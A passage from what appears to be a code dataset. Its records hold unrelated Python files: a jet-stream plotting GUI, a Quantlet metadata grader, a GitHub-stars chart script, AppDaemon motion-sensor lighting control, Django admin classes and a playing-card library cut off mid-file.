prev_lon(val):\n lonidx = int(slon.val)\n slon.set_val(lonidx-1)\n\ndef next_lon(val):\n lonidx = int(slon.val)\n slon.set_val(lonidx+1)\n\ndef prev_dt(val):\n dtidx = int(sdt.val)\n sdt.set_val(dtidx-1)\n\ndef next_dt(val):\n dtidx = int(sdt.val)\n sdt.set_val(dtidx+1)\n\ndef local_max_num_peaks(val):\n global lm\n lm['num_peaks']=int(eval(val))\n update_both_plot(val)\n\ndef local_max_min_distance(val):\n global lm\n lm['min_distance']=int(eval(val))\n update_both_plot(val)\n\ndef local_max_exclude_border(val):\n global lm\n lm['exclude_border']=int(eval(val))\n update_both_plot(val)\n\ndef local_max_threshold_abs(val):\n global lm\n lm['threshold_abs']=float(eval(val))\n update_both_plot(val)\n\ndef toggle_limitation(val):\n global lm, cjs1\n lm['peaks_inside_toggle']=not lm['peaks_inside_toggle']\n if lm['peaks_inside_toggle']:\n cjs1.label.set_text('Limitation\\nON')\n cjs1.ax.set_facecolor('green')\n else:\n cjs1.label.set_text('Limitation\\nOFF')\n cjs1.ax.set_facecolor('red')\n update_both_plot(val)\n \ndef toggle_jet_stream(val):\n global jsmap, jsvec, cjs2\n jsmap.set_visible(not jsmap.get_visible())\n jsvec.set_visible(not jsvec.get_visible())\n if jsmap.get_visible():\n cjs2.label.set_text('Jet Stream\\nON')\n cjs2.ax.set_facecolor('green')\n else:\n cjs2.label.set_text('Jet Stream\\nOFF')\n cjs2.ax.set_facecolor('red')\n plt.draw()\n\n# outer grid to frame inner grid of gui, \n# use the object handle of figure (fig) and method add_gridspec\nogs = fig.add_gridspec(5,4, left=0.05, right=0.95, top=0.95, bottom=0.05)\n# otherwise this direct call in jupyter-notebooks put the grid and widgets in new figure\n# ogs = 
gs.GridSpec(4,3, left=0.1, right=0.95, top=0.95, bottom=0.05)\n\n# use top row of ogs for inner grids\n# ogs[0,0] for peak_local_max inputs\n# ogs[0,1] \n# ogs[0,2] for lon and dt sliders\n# ogs[0,3] for next and prev button sets\n\nigs = gs.GridSpecFromSubplotSpec(4,2,subplot_spec=ogs[0,0], hspace=0.1)\n# local_peak_max input parameters\n# num_peaks\ntext_np = TextBox(fig.add_subplot(igs[0,1], title='Local Maxima Detection'), 'num_peaks', initial=str(lm['num_peaks']))\ntext_np.on_submit(local_max_num_peaks)\n# min_distance (and dilation of max_filter)\ntext_md = TextBox(fig.add_subplot(igs[1,1]), 'min_distance', initial=str(lm['min_distance']))\ntext_md.on_submit(local_max_min_distance)\n# exclude_border \ntext_exb = TextBox(fig.add_subplot(igs[2,1]), 'exclude_border', initial=str(lm['exclude_border']))\ntext_exb.on_submit(local_max_exclude_border)\n# threshold_abs\ntext_thresh = TextBox(fig.add_subplot(igs[3,1]), 'threshold (m/sec)', initial=str(lm['threshold_abs']))\ntext_thresh.on_submit(local_max_threshold_abs)\n\nigs = gs.GridSpecFromSubplotSpec(4,2,subplot_spec=ogs[0,1], hspace=0.1)\n# further JS limitation hide/show\ncjs1 = Button(fig.add_subplot(igs[2:,0]), label='Limitation\\nON', color='green', hovercolor='green')\ncjs1.on_clicked(toggle_limitation)\n# describe limitation in text\n# JS hide/show\naxbtn2 = fig.add_subplot(igs[0:2,0])\ncjs2 = Button(fig.add_subplot(igs[0:2,0]), \n label='Jet Stream\\nON', color='green', hovercolor='green')\ncjs2.on_clicked(toggle_jet_stream)\n\nigs = gs.GridSpecFromSubplotSpec(4,1,subplot_spec=ogs[0,2], hspace=0.2)\n# Longitude slider\n# use the object handle of figure (fig) and method add_subplot to add\naxlon = fig.add_subplot(igs[0])\nslon = Slider(axlon, 'Long', 0, 100, valinit=0, valfmt='%d')\nslon.on_changed(update_section_plot)\n# Date slider\naxdt = fig.add_subplot(igs[1])\nsdt = Slider(axdt, 'Date', 0, 31*4, valinit=0, valfmt='%d')\nsdt.on_changed(update_both_plot)\n\nigs = gs.GridSpecFromSubplotSpec(4,4,subplot_spec=ogs[0,3], hspace=0.2)\n# Longitude prev button\naxlonprev = fig.add_subplot(igs[0,0])\nblonprev = Button(axlonprev, '<')\nblonprev.on_clicked(prev_lon)\n# Longitude next button\naxlonnext = fig.add_subplot(igs[0,1])\nblonnext = Button(axlonnext, '>')\nblonnext.on_clicked(next_lon)\n\n# Date prev button\naxdtprev = fig.add_subplot(igs[1,0])\nbdtprev = Button(axdtprev, '<')\nbdtprev.on_clicked(prev_dt)\n# Date next button\naxdtnext = fig.add_subplot(igs[1,1])\nbdtnext = Button(axdtnext, '>')\nbdtnext.on_clicked(next_dt)\n\n\ndef init_plot():\n \"\"\" initialize plots, finish setting up, and set slider limits\n \"\"\"\n global js,jsmap,jsvec,cf1,cf2,cs11,cs12,cs13,cs2\n dtidx = 0\n lonidx = 65 # start lon on 75W\n\n dt_str = d['dt'][dtidx].strftime(\"%Y_%m_%d_%H%M\")\n t1.set_text(dt_str)\n\n vsec_str = 'Section at lon=%.1f' % d['lon'][lonidx]\n t2.set_text(vsec_str)\n\n slon.valinit = lonidx\n slon.valmin = 0\n slon.valmax = len(d['lon'])-1\n slon.valstep = 1\n\n sdt.valinit = dtidx\n sdt.valmin = 0\n sdt.valmax = len(d['dt'])-1\n\n update_both_plot(0)\n\n # plot map adn set up colorbar\n # draw colorbar\n cb = fig.colorbar(cf1, cax=axs[1], orientation='horizontal') \n cb.set_label('Wind Speed (m/sec)')\n\n\nif len(sys.argv)==2:\n yyyy_mm = sys.argv[1]\nelse:\n yyyy_mm = '2018_01'\n\nBB['dt'] = find_months(yyyy_mm)\nBB_fig['dt'] = find_months(yyyy_mm)\n\n# input path of netcdf files\n# local data\n# indir = os.path.join('/data', 'era5', 'test')\n# d = get_data(indir, BB)\n\n# use data on dap server\n# dapdir = 
'http://whewell.marine.unc.edu/dods/era5/test' # 10/60 N\ndapdir = 'http://whewell.marine.unc.edu/dods/era5' # 0/80 N\nd = get_data(dapdir, BB)\n\ninit_plot()\nplt.draw()\n","repo_name":"neaptide/jsviz","sub_path":"jsviz.py","file_name":"jsviz.py","file_ext":"py","file_size_in_byte":14953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"17361700083","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 21 12:50:32 2018\n\n@author: sterlinm.hub\n\"\"\"\n\n\nimport itertools, yaml, datetime, re\nimport numpy as np\nfrom nltk.corpus import stopwords\nclass METAFILE:\n    \"\"\" This class contains the metainfo file information. \"\"\"\n    keyReplacement = {\n        'author': ['authors'],\n        'input': ['inputs'],\n        'datafiles': ['datafile'],\n        'name of quantlet': ['iname of quantlet'],\n        'subfunctions' : ['subfunction'],\n        'submitted' : ['submited','submitte','submitted by']\n    }\n    keyReplacementValues = list(itertools.chain.from_iterable(keyReplacement.values()))\n    def __init__(self, file, repo, content, commits):\n        \"\"\"Initializing function for the class METAFILE.\n        file -- github.ContentFile.ContentFile of the metainfo file\n        repo -- the repository in which the metainfo file is\n        \"\"\"\n        self.metainfo_undebugged = file.decoded_content.decode()\n        self.repo_name = repo.name\n        self.path_in_repo = file.path\n        self.path_of_metainfo = '/'.join([self.repo_name,file.path])\n        self.directory = '/'.join([self.repo_name,file.path.replace(file.name,'')])\n        if self.directory.endswith('/'):\n            self.directory = self.directory[:-1]\n        self.is_debuggable = False\n        self.last_modified = file.last_modified\n        self.commit_first = {k:v for k,v in commits[1].raw_data.items() if k in ['sha','commit']}\n        self.commit_last = {k: v for k, v in commits[0].raw_data.items() if k in ['sha', 'commit']}\n        self.sha = file.sha\n        self.size = file.size\n        try: #FIXME: no general error exceptions\n            try:\n                self.metainfo_debugged = METAFILE.yaml_debugger(self.metainfo_undebugged)\n            except yaml.scanner.ScannerError as e:\n                self.metainfo_debugged = METAFILE.yaml_debugger(METAFILE.pre_clean(self.metainfo_undebugged))\n            self.is_debuggable = True\n\n            self.metainfo_debugged = {k.lower(): v for k, v in self.metainfo_debugged.items()}\n            self.metainfo_debugged = METAFILE.clean_keys(self.metainfo_debugged)\n            self.create_keyword_list()\n            self.list_to_string()\n            file_type = [c.name.split('.')[-1].lower() for c in content if c.name.split('.')[0].lower() == self.metainfo_debugged['name of quantlet'].lower()]\n            file_type = [i for i in file_type if i in ['m','r','py','c','sh','ipynb','sas']]\n            if file_type:\n                self.software = ','.join(file_type)\n            else:\n                self.software = None\n            self.__grading(content)\n        except:\n            pass\n#        [i for i in file_type if i not in ['png','jpg','jpeg','pdf']]\n\n    def pre_clean(c):\n        \"\"\"Correct non-YAML-debuggable files which contain ':' at the wrong location. 
\"\"\"\n csplit = c.split(':')\n _tmp = ['\\n\\n' in b or '\\n' in b for b in csplit]\n _tmp[0] = True\n _tmp[-1] = True\n if all(_tmp):\n return c\n idx = np.argwhere([not b for b in _tmp]).flatten()\n idx[::-1].sort()\n for i in idx:\n csplit[i] += ' -'+csplit[i+1]\n csplit = np.delete(csplit,i+1)\n return ':'.join(csplit)\n def yaml_debugger(x):\n \"\"\" YAML debugging the string, correcting for tabs \"\"\"\n x = x.replace('\\t', ' ')\n x = x.replace('\\r', ' ')\n res = yaml.load(x, Loader = yaml.SafeLoader)\n return res\n def clean_keys(d):\n \"\"\" Renames keys of the dictary that were used falsely\"\"\"\n # import copy; d = copy.deepcopy(tmp)\n _contains_brackets = ['[' in i for i in list(d.keys())]\n if any(_contains_brackets):\n ret = {}\n for k,v in d.items():\n if '[' not in k:\n ret.update({k:v})\n for k,v in d.items():# [{k:v} for k,v in d.items() if '[' in k]:\n if '[' in k:\n _key = (k.split('[')[0]).rstrip()\n if _key in ret.keys():\n if isinstance(v,list):\n if isinstance(ret[_key],str):\n v = v.split(', ')\n ret[_key].extend(v)\n elif isinstance(v,str) and isinstance(ret[_key],list):\n ret[_key].extend(v.split(', '))\n elif isinstance(v,str) and isinstance(ret[_key],str):\n ret[_key] += ', '+ v\n else:\n ret.update({_key: v})\n d = ret\n \n # TODO check with string distance which field is meant and combine\n if True:\n _d = np.concatenate(list(METAFILE.keyReplacement.values()))\n _b = np.isin(_d,np.array(list(d.keys())))\n tmp = {}\n if any(_b):\n for k,v in METAFILE.keyReplacement.items():\n for v2 in [v2 for v2 in v if v2 in _d[_b]]:\n tmp.update({k: v2})\n for k,v in tmp.items():\n d[k] = d.pop(v)\n return d\n def list_to_string(self):\n \"\"\" parsing lists to string, since yaml can contain list \"\"\"\n if not self.is_debuggable:\n return\n for k,v in self.metainfo_debugged.items():\n if isinstance(v,list) and all([isinstance(i,str) for i in v]):\n sep = ', '\n if k == 'description':\n sep = '.\\n'\n elif k == 'author':\n if [i for i in self.metainfo_debugged[k] if ',' in i]:\n self.metainfo_debugged[k] = [' '.join(i.split(',',1)[::-1]) for i in self.metainfo_debugged[k]]\n self.metainfo_debugged[k] = sep.join(v)\n def create_keyword_list(self):\n \"\"\" Saves the keywords as a list \"\"\"\n if isinstance(self.metainfo_debugged['keywords'],list):\n self.keyword_list = self.metainfo_debugged['keywords']\n elif self.metainfo_debugged['keywords'] is None:\n self.keyword_list = []\n else:\n self.keyword_list = self.metainfo_debugged['keywords'].split(',')\n self.keyword_list = [i.lstrip(' ') for i in self.keyword_list]\n self.keyword_list.sort()\n \n def __grading(self,content):\n self.grading_output = {\n 'q_quali': ['A'], # quality of metainfo file\n 'keywords':None, # number of keywords\n 'description_length':None, # number of words in discription\n 'description_length_wo_stopwords':None, # number of words without stopwords in discription\n 'comment':[], # indication why grade worse than A was given\n 'pictures':None, # number of pictures in \n 'submitted_year':None # submission year\n }\n \n if self.is_debuggable:\n _fields = ['author', 'description','keywords','name of quantlet', 'published in']\n _missing_fields = [c for c in _fields if c not in self.metainfo_debugged.keys()]\n if len(_missing_fields)>0:\n _msg = ', '.join(_missing_fields)\n if len(_missing_fields)>1:\n _msg += ' is missing'\n else:\n _msg += ' are missing'\n self.grading_output['comment'].append(_msg)\n self.grading_output['q_quali'].append('D')\n try:\n self.grading_output['q_name'] = 
self.metainfo_debugged['name of quantlet']\n                self.grading_output['keywords'] = len(self.keyword_list)\n                self.grading_output['description_length'] = len(self.metainfo_debugged['description'].split())\n                stop_words = set(stopwords.words('english'))\n                self.grading_output['description_length_wo_stopwords'] = len([word for word in self.metainfo_debugged['description'].split() if word not in stop_words])\n\n                if 'submitted' in self.metainfo_debugged.keys() and self.metainfo_debugged['submitted'] is not None:\n                    try:\n                        submission_year = re.findall(r\"(\d{4})\", self.metainfo_debugged['submitted'])\n                        if submission_year:\n                            self.grading_output['submitted_year'] = min(submission_year)\n                    except:\n                        pass\n\n                if self.grading_output['submitted_year'] is None:\n                    # fall back to the year the file was last modified\n                    self.grading_output['submitted_year'] = datetime.datetime.strptime(self.last_modified,'%a, %d %b %Y %H:%M:%S GMT').strftime('%Y')\n\n            except:\n                self.grading_output['q_quali'] = 'F'\n                self.grading_output['comment'] = '! '.join(self.grading_output['comment'])\n                return None\n            if self.grading_output['keywords'] < 5:\n                if self.grading_output['keywords'] > 0:\n                    self.grading_output['q_quali'].append('B')\n                    self.grading_output['comment'].append('less than 5 keywords')\n                else:\n                    self.grading_output['q_quali'].append('C')\n                    self.grading_output['comment'].append('no keywords found')\n            if self.grading_output['description_length'] < 10:\n                if self.grading_output['description_length'] > 0:\n                    self.grading_output['comment'].append('less than 10 words in description')\n                    self.grading_output['q_quali'].append('B')\n                else:\n                    self.grading_output['comment'].append('no description')\n                    self.grading_output['q_quali'].append('C')\n            content2 = [c.name.split('.') for c in content]\n            if not any(['.'.join(c[:len(c)-1]).lower() == self.grading_output['q_name'].lower() for c in content2 if c[-1].lower() not in ['png','jpg','jpeg','pdf','md']]):\n                self.grading_output['comment'].append('Q is not in folder or named differently')\n                self.grading_output['q_quali'].append('D')\n        else:\n            self.grading_output['q_quali'] = 'F'\n            self.grading_output['comment'] = 'YAML debug error'\n            return None\n        self.grading_output['pictures'] = sum([c.name.split('.')[-1].lower() in ['png','jpg','jpeg'] for c in content])\n        pdfs = [c for c in content if 'pdf' == c.name.split('.')[-1].lower()]\n        if len(pdfs) > 0 and self.grading_output['pictures'] == 0:\n            #_refs = [c.name.split('.')[0] for c in _contents if c.name.split('.')[1] in ['png','jpg','jpeg']]\n            #_pdfs = [c for c in _pdfs if c.name.split('.')[0] in _refs]\n            self.grading_output['comment'].append('only PDF picture in folder (?)')\n            self.grading_output['q_quali'].append('B')\n        self.grading_output['comment'] = '! 
'.join(self.grading_output['comment'])\n self.grading_output['q_quali'] = max(self.grading_output['q_quali'])\n self.grade = self.grading_output['q_quali']\n","repo_name":"QuantLetTeam/Quantlet_Evaluation","sub_path":"modules/METAFILE.py","file_name":"METAFILE.py","file_ext":"py","file_size_in_byte":11075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"14478114226","text":"#!/usr/bin/python\r\n# -*- coding:utf8 -*-\r\n\r\n\r\nimport pygal\r\nimport requests\r\nfrom pygal.style import LightColorizedStyle as LCS , LightenStyle as LS\r\n\r\ndef get_status_code():\r\n #调用API\r\n\r\n url = 'https://api.github.com/search/repositories?q=language:python&sort=stars'\r\n r = requests.get(url)\r\n return r.status_code\r\n\r\n #将API响应存储到变量中\r\n request = r.json()\r\n\r\n #探索仓库的有关信息\r\n repo_dicts = request['items']\r\n print(\"Number of items:\",len(repo_dicts))\r\n\r\n names,plot_dicts =[],[]\r\n for repo_dict in repo_dicts:\r\n names.append(repo_dict['name'])\r\n\r\n plot_dict = {\r\n 'value':repo_dict['stargazers_count'],\r\n 'label':str(repo_dict['description']),\r\n }\r\n\r\n plot_dicts.append(plot_dict)\r\n\r\n #可视化\r\n my_style = LS('#333366',base_style=LCS)\r\n\r\n my_config = pygal.Config()\r\n my_config.x_label_rotation = 45\r\n my_config.show_legend = False\r\n my_config.title_font_size = 24\r\n my_config.label_font_size = 14\r\n my_config.major_label_font_size = 18\r\n my_config.truncate_label = 15\r\n my_config.show_y_guides = False\r\n my_config.width = 1000\r\n\r\n chart = pygal.Bar(my_config,style=my_style)\r\n chart.title = 'Most-Started Python Projects on Github'\r\n chart.x_labels = names\r\n\r\n chart.add('',plot_dicts)\r\n chart.render_to_file('Python_repos.svg')\r\n\r\nget_status_code()","repo_name":"Flerken101/Python-Crash-Course","sub_path":"Chapter 17/python_repos.py","file_name":"python_repos.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"628867119","text":"import os\n\nROOT = \"/Data/Crawling\"\nos.makedirs(ROOT, exist_ok=True)\n\nimport hashlib\n\ndef convert_hash(file):\n if not isinstance(file, (bytes)):\n with open(file, 'rb') as f:\n file = f.read()\n md5 = hashlib.md5()\n md5.update(file)\n return md5.hexdigest()","repo_name":"jjerry-k/image_crawler","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4196086877","text":"class Solution:\n def findLongestWord(self, s: str, d: List[str]) -> str:\n def is_sub(s1, s2):\n index = 0\n for c in s2:\n if index >= len(s1):\n break\n if c == s1[index]:\n index += 1\n return index >= len(s1)\n\n d.sort(key=lambda word: (-len(word), word))\n for word in d:\n if is_sub(word, s):\n return word\n return \"\"\n","repo_name":"sabercon/algorithm-python","sub_path":"501_600/524.py","file_name":"524.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8046340441","text":"import appdaemon.plugins.hass.hassapi as hass\nimport datetime\n\n#\n# Motion Control - Trigger actions based on motion sensors.\n#\n# Args:\n# manual_toggle - Input control used to override automatic controls\n# motion_sensors - The sensors that will be used to determine if entities should be automatically controlled\n# controlled_entities - The 
entities that will be automatically updated at provided times \n#\n\nclass MotionControl(hass.Hass):\n\tdef initialize(self):\n\t\tself.__manual_toggle = self.args[\"manual_toggle\"]\n\t\tself.__motion_sensors = self.args[\"motion_sensors\"]\n\t\tself.__entity_rulesets = self.args[\"entity_rulesets\"]\n\t\tself.__current_entity_ruleset = {}\n\n\t\t# Register Manual Toggle Handlers\n\t\tself.handle_manual_toggle = self.listen_state(self.__on_manual_toggle, self.__manual_toggle['entity'])\n\n\t\t# Register Sensor Handlers\n\t\tfor (sensor, sensor_details) in self.__motion_sensors.items():\n\t\t\tself.log(\"Registering Sensor: %s.\" % (sensor))\n\t\t\tself.handle_motion = self.listen_state(self.__on_motion_change, sensor, new = sensor_details['on_state'].casefold())\n\t\t\tself.handle_no_motion = self.listen_state(self.__on_motion_change, sensor, old = sensor_details['on_state'].casefold(), duration = sensor_details['duration'])\n\t\t\tsensor_details['on'] = (sensor_details['on_state'].casefold() == self.get_state(sensor))\n\t\t\tself.log(\"Current Sensor Values: %s\" % (self.__motion_sensors[sensor]))\n\n\t\t# Register Ruleset Time Handlers\n\t\tfor ruleset in self.__entity_rulesets:\n\t\t\ttime = self.parse_time(ruleset[\"end\"])\n\t\t\trun_time = datetime.time(time.hour, time.minute, time.second + 1)\n\t\t\tself.run_daily(self.__on_ruleset_change, run_time)\n\t\t\t\n\t\tself.update_entity_states()\n\n\tdef update_entity_states(self):\n\t\tself.__update_current_entity_ruleset()\n\t\tself.__trigger_lights()\n\n\tdef __update_current_entity_ruleset(self):\n\t\t# Determine if current ruleset is valid\n\t\tif(self.__time_in_range(self.__current_entity_ruleset) == False):\n\t\t\t# Update to latest ruleset \n\t\t\tfor ruleset in self.__entity_rulesets:\n\t\t\t\tif(self.__time_in_range(ruleset)):\n\t\t\t\t\tself.log(\"New ruleset applied. 
Start: %s End: %s\" % (ruleset['start'], ruleset['end']))\n\t\t\t\t\tself.__current_entity_ruleset = ruleset\n\t\t\t\t\tbreak\n\n\tdef __time_in_range(self, ruleset):\n\t\t# Ensure ruleset has been loaded and that it doesn't cover a full (full days rulesets always valid)\n\t\tif (ruleset == {}): return False\n\t\tif (ruleset['start'] == ruleset['end']): return True\n\t\tself.log(\"Ruleset Valid: Start: %s End: %s Valid: %s\" % (ruleset['start'], ruleset['end'], self.now_is_between(ruleset['start'], ruleset['end'])))\n\t\treturn self.now_is_between(ruleset['start'], ruleset['end']) \n\n\tdef __on_ruleset_change(self, kwargs):\n\t\tself.update_entity_states()\n\n\tdef __on_manual_toggle(self, entity, attribute, old, new, kwargs):\n\t\tself.log(\"Manual Toggle Triggers: entity:%s attribute:%s old:%s new:%s\" % (entity, attribute, old, new))\n\t\tself.__trigger_lights()\n\n\tdef __on_motion_change(self, entity, attribute, old, new, kwargs):\n\t\tself.log(\"Motion State Detected: entity:%s attribute:%s old:%s new:%s\" % (entity, attribute, old, new))\n\t\tself.__update_sensor_status(entity, new.casefold())\n\t\tself.__trigger_lights()\n\t\n\tdef __update_sensor_status(self, entity, value):\n\t\tself.__motion_sensors[entity]['on'] = (value == self.__motion_sensors[entity]['on_state'].casefold())\n\n\tdef __trigger_lights(self):\n\t\tauto_toggle = (self.get_state(self.__manual_toggle['entity']).casefold() == self.__manual_toggle['automatic_state'].casefold()) \n\t\tif(auto_toggle):\n\t\t\tif any(sensor['on'] == True for sensor in self.__motion_sensors.values()):\n\t\t\t\tself.log(\"Turning lights on\")\t\t\t\t\n\t\t\t\tself.__apply_entity_rules(self.__current_entity_ruleset, True)\n\t\t\telse:\n\t\t\t\tself.__apply_entity_rules(self.__current_entity_ruleset, False)\n\n\t\telse: self.log(\"Automatic control currently disabled.\") \n\n\tdef __apply_entity_rules(self, entity_ruleset, on):\n\t\tfor entity in entity_ruleset['entities']:\n\t\t\tself.log(entity)\n\t\t\tentity_on = on and entity['device_on'] \n\t\t\tself.log(entity_on)\n\t\t\tif(entity_on):\n\t\t\t\tself.log(\"Attempting request for: %s\" % (entity['entity']))\n\t\t\t\tif 'attributes' in entity: \n\t\t\t\t\tself.turn_on(entity['entity'], **entity['attributes'])\n\t\t\t\telse:\n\t\t\t\t\tself.turn_on(entity['entity'])\n\t\t\telse:\n\t\t\t\tself.turn_off(entity['entity'])","repo_name":"ericcolvinmorgan/AppDaemon","sub_path":"apps/motion_control.py","file_name":"motion_control.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17216292131","text":"from django.contrib import admin\nfrom django.utils.safestring import mark_safe\nfrom buzz.services import get_object_admin_link\nfrom .models import League, Season, Circuit, Group, Round\nfrom teams.models import Team\n\nclass LeagueAdmin(admin.ModelAdmin):\n \n def seasons(self):\n links = ''\n for obj in self.seasons.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n readonly_fields = (seasons,) \n\nclass SeasonAdmin(admin.ModelAdmin):\n\n list_display = (\n 'name',\n 'league',\n 'is_active',\n 'current_round',\n 'registration_open',\n 'rosters_open' \n ) \n \n def circuits(self):\n links = ''\n for obj in self.circuits.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n def rounds(self):\n links = ''\n\n for obj in self.rounds.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n autocomplete_fields = ['current_round']\n readonly_fields = (circuits, rounds) \n\nclass CircuitAdmin(admin.ModelAdmin):\n\n list_display = (\n 'name',\n 'region',\n 'tier',\n 'season'\n ) \n\n\n def teams(self):\n links = ''\n for obj in self.teams.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n \n search_fields = ('name',)\n readonly_fields = (teams,) \n\nclass GroupAdmin(admin.ModelAdmin):\n \n list_display = (\n 'circuit',\n 'name',\n 'number',\n ) \n\n def teams(self):\n links = ''\n for obj in self.teams.all():\n link = get_object_admin_link(obj, obj)\n links += f'{link},
        '\n \n links = links[0:-6]\n links = mark_safe(links)\n return links\n \n \n search_fields = ('name', 'circuit__name')\n readonly_fields = (teams,) \n\nclass RoundAdmin(admin.ModelAdmin):\n \n list_display = (\n 'season',\n 'round_number',\n 'name',\n ) \n\n search_fields = ('season__name',)\n\n ordering = ['-id']\n\nadmin.site.register(League, LeagueAdmin)\nadmin.site.register(Season, SeasonAdmin)\nadmin.site.register(Circuit, CircuitAdmin)\nadmin.site.register(Group, GroupAdmin)\nadmin.site.register(Round, RoundAdmin)\n","repo_name":"dadcore-digital/buzz","sub_path":"leagues/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"6443304811","text":"#!/usr/bin/env python3\n\nimport random\n\nTOP = 'top'\nBOTTOM = 'bottom'\n\n#go fish actions\nDNH='dnh', #does not have\nRCV='rcv', #received cards\nTAT='tat', #takes a trick\nGOF='gof', #went fishing\nGFC='gfc', #go fish card, continue turn\nRDH='rdh', #ran out of cards, redealt\n\nFRENCH_SUITS = list('cdhs')\nSTAR_SUITS = list('cdhst')\nWHITE_SYMBOL_SUITS = list('♧♢♡♤☆')\nBLACK_SYMBOL_SUITS = list('♣♦♥♠★')\n\nFRENCH_RANKS = list('A23456789TJQK')\nKNIGHT_RANKS = list('A23456789TJNQK')\n\nLETTER_2_BLACK_SYMBOL = {\n'c':'♣',\n'd':'♦',\n'h':'♥',\n's':'♠',\n't':'★',\n'':'',\n}\n\nLETTER_2_WHITE_SYMBOL = {\n'c':'♧',\n'd':'♢',\n'h':'♡',\n's':'♤',\n't':'☆',\n'':'',\n}\n\nDEFAULT_SORT_DICT = {\n 'ranks':{\n 'j':0,\n 'A':1,\n '2':2,\n '3':3,\n '4':4,\n '5':5,\n '6':6,\n '7':7,\n '8':8,\n '9':9,\n 'T':10,\n 'J':11,\n 'N':12,\n 'Q':13,\n 'K':14,\n },\n 'suits':{\n '':0,\n 'c':1,\n 'd':2,\n 'h':3,\n 's':4,\n 't':5,\n },\n}\n\nBIGA_SORT_DICT = {\n 'ranks':{\n 'j':0,\n '2':2,\n '3':3,\n '4':4,\n '5':5,\n '6':6,\n '7':7,\n '8':8,\n '9':9,\n 'T':10,\n 'J':11,\n 'N':12,\n 'Q':13,\n 'K':14,\n 'A':15,\n },\n 'suits':{\n '':0,\n 'c':1,\n 'd':2,\n 'h':3,\n 's':4,\n 't':5,\n },\n}\n\nPOKER_SORT_DICT = {\n 'ranks':{\n 'j':0,\n '2':2,\n '3':3,\n '4':4,\n '5':5,\n '6':6,\n '7':7,\n '8':8,\n '9':9,\n 'T':10,\n 'J':11,\n 'N':12,\n 'Q':13,\n 'K':14,\n 'A':15,\n },\n}\n\nSUIT_SORT_DICT = {\n 'suits':{\n '':0,\n 'c':1,\n 'd':2,\n 'h':3,\n 's':4,\n 't':5,\n },\n}\n\n\ndef new_deck(**kwargs):\n shuffle = kwargs.get('shuffle', False)\n jokers = kwargs.get('jokers', 0)\n ranks = kwargs.get('ranks', FRENCH_RANKS)\n suits = kwargs.get('suits', FRENCH_SUITS)\n deck = Stack()\n for _ in range(jokers):\n deck.add(Card('j', ''), BOTTOM)\n for rank in ranks:\n for suit in suits:\n deck.add(Card(rank,suit), BOTTOM)\n if shuffle:\n deck.shuffle()\n return deck\n\n\ndef check_term(term, ranks=KNIGHT_RANKS, suits=STAR_SUITS):\n return isinstance(term, str) and len(term) == 2 and \\\n term[0] in ranks and term[1] in suits\n\n\nclass Card:\n def __init__(self, rank_or_value, suit=None):\n if suit is None:\n assert len(rank_or_value) == 2, \"object provided must be length 2\"\n self.rank = rank_or_value[0]\n self.suit = rank_or_value[1]\n else:\n self.rank = rank_or_value\n self.suit = suit\n\n def __iter__(self):\n return iter(str(self))\n\n def __len__(self):\n return 2\n\n def __getitem__(self, item):\n if item in [0, 'rank']:\n return self.rank\n elif item in [1, 'suit']:\n return self.suit\n else:\n raise KeyError(\"valid keys for Card: 0, 1, 'ranks', 'suits'\")\n\n def __eq__(self, other, sort_dict=DEFAULT_SORT_DICT):\n return sort_dict['ranks'][self.rank] == sort_dict['ranks'][other[0]] and \\\n sort_dict['suits'][self.suit] == 
sort_dict['suits'][other[1]]\n eq = __eq__\n\n def __ne__(self, other, sort_dict=DEFAULT_SORT_DICT):\n return not self.eq(other, sort_dict)\n ne = __ne__\n\n def __gt__(self, other, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n if ranks_first:\n if sort_dict['ranks'][self.rank] > sort_dict['ranks'][other[0]]:\n return True\n elif sort_dict['ranks'][self.rank] == sort_dict['ranks'][other[0]]:\n if sort_dict['suits'][self.suit] > sort_dict['suits'][other[1]]:\n return True\n else:\n return False\n else:\n return False\n else:\n if sort_dict['suits'][self.suit] > sort_dict['suits'][other[1]]:\n return True\n elif sort_dict['suits'][self.suit] == sort_dict['suits'][other[1]]:\n if sort_dict['ranks'][self.rank] > sort_dict['ranks'][other[0]]:\n return True\n else:\n return False\n else:\n return False\n gt = __gt__\n\n def __lt__(self, other, sort_dict=DEFAULT_SORT_DICT, ranks_first=True):\n if ranks_first:\n if sort_dict['ranks'][self.rank] < sort_dict['ranks'][other[0]]:\n return True\n elif sort_dict['ranks'][self.rank] == sort_dict['ranks'][other[0]]:\n if sort_dict['suits'][self.suit] < sort_dict['suits'][other[1]]:\n return True\n else:\n return False\n else:\n return False\n else:\n if sort_dict['suits'][self.suit] < sort_dict['suits'][other[1]]:\n return True\n elif sort_dict['suits'][self.suit] == sort_dict['suits'][other[1]]:\n if sort_dict['ranks'][self.rank] < sort_dict['ranks'][other[0]]:\n return True\n else:\n return False\n else:\n return False\n lt = __lt__\n\n def __ge__(self, other, 